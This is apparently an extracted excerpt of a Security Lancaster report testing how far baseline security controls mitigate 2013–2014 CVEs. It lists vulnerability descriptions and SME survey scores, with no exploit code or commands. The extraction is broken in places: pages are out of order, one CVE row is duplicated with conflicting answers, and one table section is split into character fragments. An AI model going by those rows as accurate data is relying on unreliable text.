CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28

CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses


CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

4-4

14

1y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-44

81

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

An

ti-M

alw

are

CV

E-2

01

4-4

61

7y

yn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Management

CVE-2014-4631 | n n n n n | Not Mitigated | Partially Mitigated | - | Patch Management, Secure Configuration
CVE-2014-6040 | n n n n n | Not Mitigated | Partially Mitigated | - | Patch Management
CVE-2014-6105 | n n n n n | Not Mitigated | Mitigated | - | Firewall, Patch Management
CVE-2014-6136 | n n n n n | Not Mitigated | Mitigated | - | Secure Configuration, Patch Management
CVE-2014-6363 | y n y y n | Not Mitigated | Mitigated | - | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y n y y | Not Mitigated | Mitigated | - | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n n n n n n | Not Mitigated | Mitigated | - | Firewall, Patch Management
CVE-2014-6487 | n n y n n | Not Mitigated | Partially Mitigated | - | Patch Management
CVE-2014-7250 | n y y n n | Not Mitigated | Mitigated | - | Firewall, Patch Management
CVE-2014-7927 | y y y y n | Not Mitigated | Mitigated | - | Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y y y y n | Not Mitigated | Partially Mitigated | - | Patch Management
CVE-2014-8447 | y y y y n | Not Mitigated | Partially Mitigated | - | Anti-Malware, Patch Management
CVE-2014-8638 | y y y y y | Not Mitigated | Mitigated | - | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y y y y y | Not Mitigated | Partially Mitigated | - | Patch Management
CVE-2014-9159 | y y y y y | Not Mitigated | Partially Mitigated | - | Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y y y y y | Not Mitigated | Partially Mitigated | - | Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y y y y n | Not Mitigated | Mitigated | - | Firewall, Anti-DoS, Firmware Updates
CVE-2014-9357 | n n n n n | Not Mitigated | Partially Mitigated | - | Patch Management, Anti-Malware, Secure Configuration

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster Page 18 of 28

CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant_name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

